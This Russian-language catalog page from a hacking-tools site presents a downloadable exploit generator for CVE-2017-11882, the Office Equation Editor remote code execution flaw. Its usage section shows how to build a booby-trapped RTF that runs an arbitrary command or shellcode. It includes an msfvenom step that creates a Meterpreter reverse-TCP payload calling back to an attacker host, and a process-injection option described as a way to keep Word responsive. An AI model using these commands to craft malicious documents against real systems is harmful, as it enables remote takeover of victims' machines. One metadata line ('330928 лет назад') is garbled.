Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-11882 — CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum. | Kitploit
Инструменты/GitHubGitHub/rip1s/cve-2017-11882
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingBinary Exploitation
GitHubrip1s/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.

Репозиторий
330928 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2017-11882

Эксплойт CVE-2017-11882 принимает команду/код длиной до 17 тысяч байт.

Для удаленного выполнения команд этот эксплойт вызывает WinExec с флагом SW_HIDE и вызывает ExitProcess после возврата из WinExec.

Для удаленного выполнения кода этот эксплойт просто переходит (jmp) на код.

Я не смог найти ссылку на структуру объекта... поэтому не могу изменить длину файла для произвольного выполнения кода..:(

Но я считаю, что 17 тысяч байт действительно достаточно. Python-скрипт определит необходимый размер полезной нагрузки и выберет правильный шаблон.

Внимание: RCE заблокирует процесс winword, если вы не перейдете на другой процесс!

В настоящее время этот эксплойт внедряет ваш shellcode в новый процесс EQNEDT32.EXE, если указан флаг -i. Эта операция подозрительна для антивирусов, но она не заблокирует процесс Word.

Использование

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf

Пример:

Для удаленного выполнения команд

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

Для удаленного выполнения кода

  1. Сгенерируйте shellcode
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. Создайте эксплойт
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

Отладка

  1. Установите значение отладчика на путь к вашему отладчику в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE

  2. Создайте эксплойт и запустите его.

  3. Установите точку останова по адресу 0x41165f

  4. Эта точка останова сработает дважды; при втором срабатывании полезная нагрузка будет выполнена после возврата из этой функции.

Ссылки

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
Скачать инструмент